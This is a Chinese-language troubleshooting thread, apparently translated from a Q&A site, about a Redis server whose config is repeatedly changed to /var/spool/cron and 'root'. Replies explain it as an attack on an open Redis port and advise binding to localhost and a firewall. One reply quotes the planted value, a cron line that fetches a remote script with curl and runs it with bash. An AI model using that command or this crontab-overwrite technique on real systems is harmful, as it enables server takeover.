CONFIG GET dir --> "/var/lib/redis"我已经设置了我的redis-server 以便CONFIG GET dbfilename --> "redis.rdb".
但是,在我的服务器运行几个小时或几天后,我开始收到"Failed opening .rdb for saving: Permission denied"错误消息。
如果我再做CONFIG GET dir --> "/var/spool/cron"和CONFIG GET dbfilename --> "root"。我试图到处寻找对正在发生的事情的某种理解,但无济于事。
如果我只是重新启动我的 redis 服务器,那么配置将再次重置为我在“redis.conf”文件中设置的原始设置。
这确实是一种攻击。如果您在发生这种情况后检查您的 redis 键,您会看到一些像这样的“字符串”键:“Backup1”、“Backup2”、“Backup3”。
这些值将是这样的:
"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"
这是为了修改你的 crontab。
底线是 - 没有向世界开放 redis 端口。
看来这可能只是一个安全问题。开箱即用的 redis 可通过任何 IP 地址访问。作为检查@ItamarHaber 建议的安全问题的简单第一步,我只是将redis 服务器绑定到本地主机,现在问题似乎已经解决了。这是一篇很棒的文章,对我有帮助。关于 Redis 安全的一些事情
这可以通过重新启动VM,启用UFW防火墙,允许那些被授权访问的IP地址来解决。